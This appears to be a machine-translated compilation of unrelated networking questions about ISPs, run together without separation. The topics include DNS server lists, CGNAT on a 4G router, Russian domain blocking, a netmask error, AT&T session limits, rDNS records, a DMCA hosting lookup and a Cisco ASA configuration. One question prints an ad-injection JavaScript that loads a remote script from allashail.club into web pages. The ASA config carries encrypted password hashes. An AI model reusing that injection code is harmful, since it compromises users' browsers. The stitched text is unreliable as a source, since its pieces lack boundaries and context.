我目前正在构建一个需要来自多个不同 DNS 服务器的响应的工具。编程部分已全部完成,但我目前缺少主要 ISP DNS 服务器的 IP 地址。我所能找到的只是,我认为,不再工作的旧的。输入我的本地 DNS 服务器或公共 DNS 服务器(Google、Cloudflare 等)时,我得到了预期的结果。所以我的问题是,是否有一个列表或方法可以从这些 ISP 中找到 DNS 服务器?(特别是位于德国的 ISP)
我有一个大问题,我住在一个没有光纤或 ADSL 连接的地区,我使用 4g+ 路由器(Tp-Link Archer MR600)中的 4g+ sim 连接到互联网。连接很好:ping ~50ms - dw 240mb - up 50mb 但是有几个问题让我发疯。
- 我的 ISP 没有为我分配公共静态 IP,我有一个私有 IP,也许他们使用的是双 NAT 或 CGN,我不知道。
- 我的连接断断续续,每 4 小时一次,他们会进行某种 IP 更新,我不知道是什么原因。
我不能开门、托管任何东西、远程访问视频监控摄像头以及许多其他事情。我为合同支付了很多钱,这是唯一一个带宽和稳定性不错的 ISP,但是我上面列出的内容阻止了我做很多操作。例如,如果我每 4 小时连接一次 VPN,连接就会中断,我必须手动重新建立它。
也许(当然)这里有人有更好的知识,如果有人想给我一些澄清甚至更好的一些技巧来使事情顺利进行,我会很高兴。
问我是否需要某种输出,我会发布它。
作为另一个注释,请随时提出任何建议,我不知道什么有用。某种连接网格、VPN 或任何其他解决方案应该可以工作,我会试一试。
也许可能是错误的配置或类似的东西,但我不这么认为,ISP 以某种方式锁定了我。
我尝试过的事情:
- IP地址预留
- 级联2台路由器
- MAC地址克隆
- 非军事区
- 静态路由
谢谢。
我正在帮助运营一个网站,该网站因政治原因被之前试图阻止 Telegram (RosKomNadzor) 的同一个俄罗斯机构阻止。这不是第一次发生,以前我们只会更改域,但这有其自身的影响和读者群的损失。
他们只阻止域名,而不是 IP(无论如何我们都在使用 Cloudflare)。我们正在使用 HTTPS,但 ISP 仍然能够以某种方式从他们的客户端获取有关我们的请求的 DNS 信息。从技术上讲,我们可以建议我们的读者配置他们的/etc/hosts,但这不是一个可行的选择。
是否可以在我们的服务器端加密/混淆 DNS 信息,而无需用户进行任何更改/安装软件?还是等待 DNS over HTTPS 成为我们唯一的选择?
来自俄罗斯的爱。
众所周知,ISP 必须出于各种目的(例如执法需要)记录各种网络数据。
但是,ISP 使用哪些软件工具来浏览如此大量的网络日志?
此外,对于 ISP 来说,例如,在被传唤的情况下查找给定 IP 地址后面的用户需要多长时间?
问题:
如何诊断 ISP 特定的连接问题?
我在本地机器上托管了几个站点。我用 Centurylink 购买了一个商务舱帐户,并且有很多 5 个静态 ip。除其他 Centurylink 用户外,可从世界任何地方访问这些站点。如果我的客户没有像我一样生活在棍子里,我永远不会知道。Cox 用户、Verizon 用户、Cricket、At&t、Comcast 以及大量美国和国际互联网服务提供商可以访问我的网站和 IP 地址,但使用 Centurylink 的其他人除外。
我做了什么:
在另一个人的家中使用 Centurylink 互联网时,我尝试访问端口 80 和 443 上的每个 IP 地址。我尝试通过为该服务选择的任意端口通过 ssh 连接到服务器。我tracert在域和 IP 地址上运行并得到以下信息:
1 2ms 1ms 1ms modem.Home [192.168.0.1]
2 30ms 30ms 25ms rbflxyza84.centurylink.net [x.x.123.45]
3 29ms 30ms 33ms asdf-ghjk.inet.qwest.net [x.x.122.34]
4 29ms 30ms 33ms x.x.x.18
5 200ms 79ms 59ms x-x-45-67.orlf.qwest.net [x.x.45.67]
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * * * Request timed out.
巧合的是 xx45.67 是我在 Google What's my ipv4 into Google 时得到的 ip 地址。如果这是正常工作,则静态 IP 地址将是下一个结果,所以我认为该请求在路由器处被阻止。
使用原始公共 IP 地址,我搜索了路由器上的访问日志和防火墙日志。没有远程IP地址的记录。根据我为其他 IP 地址设置的规则,当数据包被丢弃时,我能够找到记录。
以防万一我检查了服务器日志并没有发现远程地址的记录。
我还能在哪里检查以诊断此问题?我会问 SO Network Engineering,但他们将问题仅限于企业级问题和解决方案。
我检查了黑名单,但我的 IP 地址没有出现。我检查了路由器防火墙,但是当我的一条规则阻止了某些东西时,它会被记录下来,我可以找到记录。
我最坏情况的解决方案
在有人建议之前,我最坏的情况是通过我也管理的一些远程服务器反向代理流量。
编辑
昨晚我设置反向代理的时间比 Centurylink 的平均等待时间短。我不愿意打电话给他们,因为他们花了一个月的时间来配置我的静态 IP 地址。就像没有人理解为什么企业需要静态 IP 地址,甚至是什么。
解决方案
Michael Hampton 关于网络掩码不正确的评论是完全正确的。所有无法访问我的地址的客户端至少共享 IP 地址的前 8 位。网络掩码本应为 255.255.255.248 时为 255.0.0.0。NetworkManager 覆盖了我的设置,所以即使在正确设置之后(可能是第二次),它也会恢复到不正确的网络掩码。
背景
AT&T 商业光纤基本上更名为 U-Verse 家庭互联网。“调制解调器”(它实际上是一个路由器,但为了简单起见,我们称之为)具有大约 8K 会话的硬限制。即使调制解调器处于级联路由器模式(类似于其他设备中的桥接模式),调制解调器仍会跟踪 TCP 会话,并且在达到限制时不会允许新会话。AT&T 的回答基本上是当用户超出他们的小型商业计划并需要升级到企业光纤时,就会出现这个问题,对于相同的速度来说,企业光纤的成本要高几个数量级。对于一个非常小的办公室来说,这似乎很愚蠢。考虑到我在网上找到的所有关于这个可以追溯到 3 年多的帖子,我怀疑 AT&T 是否急于修复它。
还有一些记录在案的黑客使用路由器绕过调制解调器,但我非常胆怯地向企业推荐一些不稳定的东西。他们将需要一个长期可支持的解决方案。我很惊讶没有围绕 VPN 的想法进行任何讨论,所以我在这里。
正在探索更改 ISP,但 ISP 选项非常有限。
问题
如果客户端提供连接到 IPSEC 站点到站点 VPN 隧道的调制解调器下游的路由器,并将所有流量路由到隧道的另一端,调制解调器是否能够观察多个会话?隧道是否将所有流量都包含在它自己建立的会话中?由于 IPSEC 在比 TCP 更高的级别上运行,每个新会话是否都是刚刚加密的 WAN 上的新会话?
指向描述该问题的其他人的链接
https://www.reddit.com/r/sysadmin/comments/74qu5s/isp_nat_sessions_limit/
http://solderthoughts.com/2017/06/growth-pains-att-gigabit-fiber/
我一直在尝试设置 rDNS,以便我的 IP 可以在具有内置 rDNS 查找功能的程序中解析为我的主机名。我已经完成了我建议的所有事情(请我的 ISP 为我制作 PTR 记录,在我的注册人的仪表板上设置 A 和 SRV 记录,尽管我的 ISP 告诉我在他们这边还有另一个 PTR 记录他们不能删除,因为这是必要的,但他们告诉我这不太可能导致任何问题,因为我已将我这边的记录链接到该应用程序使用的特定端口)。
一旦我解决了注册人记录的问题,我就让它工作了,程序一直在将我的 IP 解析为正确的主机名,以及其他连接的客户端,但是第二天,当我故意重新启动 rDNS 解析时插件,不知何故,它开始仅将我解析为 ISP 分配给我的主机名(例如myID01.provider.com而不是mydomain.com),即使所有连接都通过我仪表板上的 SRV 记录中指定的唯一端口。
没错——我已经用 VPN 连接对其进行了测试,所以服务器不可能发现他与客户端在同一个网络中。
以下是 ISP 方面的 PTR 记录:
my.ip.in-addr.arpa domain name pointer mydomain.com.
my.ip.in-addr.arpa domain name pointer myID01.provider.com.
可能是什么问题呢?
我正在使用 Sophos SSL VPN 客户端。但我使用的是 BSNL ISP。每当我连接我的 VPN 并浏览任何 HTTP 非安全网站时,ADS 都会被注入到 JS 脚本文件中。但是当我断开 VPN 并浏览任何不安全的网站时。不会发生脚本注入,也不会显示 ADS
但我的问题是,我的 ISP BSNL 在连接到安全隧道后如何识别出我正在浏览一个不安全的网站。这样所有路由的网络流量都将被加密。但是他们如何使用 Network Proxy Analyzer 来注入脚本呢?
在这里您将找到连接到 VPN 时的日志
OpenVPN 2.3.8 i686-w64-mingw32 [SSL (OpenSSL)] [LZO] [IPv6] built on Jul 3 2017
library versions: OpenSSL 1.0.2l 25 May 2017, LZO 2.09
Data Channel Encrypt: Cipher 'AES-128-CBC' initialized with 128 bit key
Data Channel Encrypt: Using 256 bit message hash 'SHA256' for HMAC authentication
Data Channel Decrypt: Cipher 'AES-128-CBC' initialized with 128 bit key
Data Channel Decrypt: Using 256 bit message hash 'SHA256' for HMAC authentication
Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 2048 bit RSA
脚本(JS)
!function() {
var a = "/analytics.js"
, r = null
, e = document.getElementsByTagName("script")
, i = e.length
, n = null
, t = Date.now()
, s = null
, o = 0;
for ("/" === a.substring(0, 1) && (a = a.substring(1)),
o = 0; o < i; o += 1)
if (void 0 !== e[o].src && null !== e[o].src && e[o].src.indexOf(a) > -1) {
n = o,
r = e[o];
break
}
void 0 !== r && null !== r || (r = document.getElementsByTagName("script")[0]),
s = r.src.indexOf("?") > -1 ? r.src + "&cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" : r.src + "?cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";
try {
if (void 0 === window.sarazasarazaNoti || null === window.sarazasarazaNoti || window.sarazasarazaNoti === Array && window.sarazasarazaNoti.indexOf(r.src) < 0) {
void 0 !== window.sarazasarazaNoti && null !== window.sarazasarazaNoti || (window.sarazasarazaNoti = new Array),
window.sarazasarazaNoti.push(r.src);
var c = r.parentNode
, d = r;
if (r.async || r.defer || null !== n && n !== e.length - 1) {
var w = document.createElement("script");
w.src = s,
c.replaceChild(w, d)
} else
document.write("<script type='text/javascript' src=" + s + "><\/script>"),
c.removeChild(d)
}
} catch (a) {}
}();
document.addEventListener('DOMContentLoaded', function() {
var esp = document.createElement('span');
var esr = document.createElement('script');
esr.src = 'http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2';
esr.type = 'text/javascript';
esp.appendChild(esr);
document.body.appendChild(esp);
}, false);
HTML(脚本注入)
<html>
<head>
<script src="http://www.google-analytics.com/analytics.js?cb=1585885601053&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag"></script>
</head>
</body>
<span>
<script src="http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2" type="text/javascript"></script>
</span>
</body>
</html>
OpenVPN 配置
client
dev tun
proto tcp
verify-x509-name "OU=Domain Control Validated, CN=*.domain.com"
route remote_host 255.255.255.255 net_gateway
resolv-retry infinite
nobind
persist-key
persist-tun
<ca>
Bag Attributes: <No Attributes>
subject=/C=BE/O=GlobalSign nv-sa/CN=XXXSSL CA - SHA256 - G2
issuer=/C=BE/O=GlobalSign nv-sa/OU=Root CA/CN=GlobalSign Root CA
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
</key>
auth-user-pass pass.txt
cipher AES-128-CBC
auth SHA256
comp-lzo no
route-delay 4
verb 3
reneg-sec 86400
remote xxx.xx.xxx.xx 8443
remote xxx.xx.xxx.xx 8443
remote xxx.xx.xxx.xx 8443
remote xxx.xxx.xxx.xx 8443
remote xxx.xxx.xxx.xx 8443
建立安全连接。我们应该如何使用 OpenVPN 协议配置我的 Sophos SSL VPN 客户端
有一个网站在基本上所有内容中都克隆了我们的项目“ pixabay.com ”:内容、布局等。我们想向他们的 ISP 发送 DMCA 删除通知。但是,在查找违规域“ maxpixel.freegreatpicture.com ”时,WhoIs 工具总是报告不同的 ISP。我们有时将“black.host”作为他们的主机,然后是“digitalocean.com”,然后是一家名为“Nix Web Solutions Pvt”的公司。
我们向所有这些都发送了 DMCA 删除通知,但作为回报,我们得到的回复几乎完全相同:
首先,在发送滥用报告之前,请确保它的有效性,并确保您发送给正确的提供商。您应该了解,BlackHOST 不参与创建驻留在可使用 BlackHOST 网络访问的 Web 服务器上的内容。我们只是将数据包从一个地方运送到另一个地方。我们不看数据包的内容。我们就像邮政服务,只看告诉我们将数据包发送到哪里的地址。我们可以查看一个对公众开放的网站,但我们无法知道该网站的内容是否侵犯了他人的版权或其他权利。网站的运营商可能拥有使用该材料的许可或可能拥有其他使用它的权利。您可以告诉我们不允许使用,但我们不能将自己变成解决这些纠纷的法庭。为了让我们根据可接受的使用政策采取行动,必须有明显的违规行为,我们可以在不依赖投诉方的主张的情况下看到该违规行为。与版权和类似事项有关的指控很少出现这种情况。
我们如何才能找到将 DMCA 发送到哪里?谁是该网站的负责 ISP?
我让 Cisco ASA 与 ISP 路由器形成静态路由关系。
我不想使用任何花哨的 Anyconnect VPN 或 IPS 防火墙。
但是一些简单的 ACL 可以作为安全基调来保护网络。
配置粘贴在下面,
在这种情况下是否假设有状态防火墙?因为只有内部发起的流量会被 NAT 化并从外部返回?
此配置是否包含安全所需的基本内容?(阻止来自外部的管理访问、阻止 ping、来自外部、阻止来自外部的私有 IP 等)。
我在单个主机级别进行了防火墙/防病毒加固。当我不想在 ASA 模块上花费额外预算时,这是一个好方法吗?
谢谢。
ASAisp#
ASAisp# show run
ASA Version 9.2(4)
!
hostname ASAisp
domain-name soho.com
xlate per-session deny tcp any4 any4
xlate per-session deny tcp any4 any6
xlate per-session deny tcp any6 any4
xlate per-session deny tcp any6 any6
xlate per-session deny udp any4 any4 eq domain
xlate per-session deny udp any4 any6 eq domain
xlate per-session deny udp any6 any4 eq domain
xlate per-session deny udp any6 any6 eq domain
passwd .jaY8R6W./JP9tz1 encrypted
names
!
interface Ethernet0/0
switchport access vlan 2
!
interface Ethernet0/1
!
interface Ethernet0/2
!
interface Ethernet0/3
!
interface Ethernet0/4
!
interface Ethernet0/5
!
interface Ethernet0/6
!
interface Ethernet0/7
!
interface Vlan1
nameif inside
security-level 100
ip address 172.16.0.1 255.255.0.0
!
interface Vlan2
nameif outside
security-level 0
ip address dhcp
!
boot system disk0:/asa924-k8.bin
ftp mode passive
clock timezone PST -8
clock summer-time PDT recurring
dns domain-lookup inside
dns server-group DefaultDNS
name-server 84.200.69.80
name-server 8.8.8.8
domain-name soho.com
same-security-traffic permit inter-interface
same-security-traffic permit intra-interface
access-list inside_access_in extended permit ip 172.16.0.0 255.255.0.0 any4
access-list outside_access_in extended deny ip 10.0.0.0 255.0.0.0 any
access-list outside_access_in extended deny ip 172.16.0.0 255.240.0.0 any
access-list outside_access_in extended deny ip 192.168.0.0 255.255.0.0 any
pager lines 24
logging enable
logging buffer-size 987564
logging buffered informational
logging asdm informational
mtu inside 1500
mtu outside 1500
ip verify reverse-path interface inside
ip verify reverse-path interface outside
icmp unreachable rate-limit 1 burst-size 1
asdm image disk0:/asdm-762-150.bin
no asdm history enable
arp timeout 14400
no arp permit-nonconnected
!
nat (inside,outside) after-auto source dynamic any interface
access-group inside_access_in in interface inside
access-group outside_access_in in interface outside
router ospf 1
router-id 5.5.5.5
network 10.10.10.0 255.255.255.0 area 0
log-adj-changes
!
route outside 0.0.0.0 0.0.0.0 1.2.3.4 1
timeout xlate 3:00:00
timeout pat-xlate 0:00:30
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
timeout floating-conn 0:00:00
dynamic-access-policy-record DfltAccessPolicy
user-identity default-domain LOCAL
aaa authentication ssh console LOCAL
aaa authentication http console LOCAL
aaa local authentication attempts max-fail 3
http server enable
http 172.16.0.0 255.255.0.0 inside
no snmp-server location
no snmp-server contact
crypto ipsec ikev1 transform-set ESP-AES-128-SHA esp-aes esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-128-MD5 esp-aes esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-AES-192-MD5 esp-aes-192 esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-AES-256-SHA esp-aes-256 esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-256-MD5 esp-aes-256 esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-3DES-MD5 esp-3des esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-DES-SHA esp-des esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-DES-MD5 esp-des esp-md5-hmac
crypto ipsec ikev1 transform-set ESP-3DES-SHA esp-3des esp-sha-hmac
crypto ipsec ikev1 transform-set ESP-AES-192-SHA esp-aes-192 esp-sha-hmac
crypto ipsec security-association pmtu-aging infinite
crypto ca trustpool policy
no crypto isakmp nat-traversal
telnet timeout 5
ssh stricthostkeycheck
ssh 172.16.0.0 255.255.0.0 inside
ssh timeout 5
ssh version 2
ssh key-exchange group dh-group1-sha1
console timeout 0
management-access inside
dhcp-client client-id interface outside
dhcpd dns 84.200.69.80 8.8.8.8
dhcpd domain soho.com
dhcpd update dns both override
dhcpd option 3 ip 172.16.0.1
!
dhcpd address 172.16.1.100-172.16.1.130 inside
dhcpd enable inside
!
threat-detection basic-threat
threat-detection statistics host
threat-detection statistics access-list
threat-detection statistics tcp-intercept rate-interval 30 burst-rate 400 average-rate 200
ntp server 216.228.192.69 source outside
group-policy DfltGrpPolicy attributes
vpn-tunnel-protocol ikev1 l2tp-ipsec ssl-clientless
username sndlt password ulTKijFmUYuV.Wg5 encrypted privilege 15
!
class-map inspection_default
match default-inspection-traffic
!
!
policy-map type inspect dns preset_dns_map
parameters
message-length maximum client auto
message-length maximum 512
policy-map global_policy
class inspection_default
inspect dns preset_dns_map
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
inspect sip
inspect netbios
inspect tftp
inspect ip-options
inspect icmp
!
service-policy global_policy global
prompt hostname context
no call-home reporting anonymous
Cryptochecksum:a5696a05725e77f8ef546ce93ebb692d
: end
ASAisp#
ASAisp#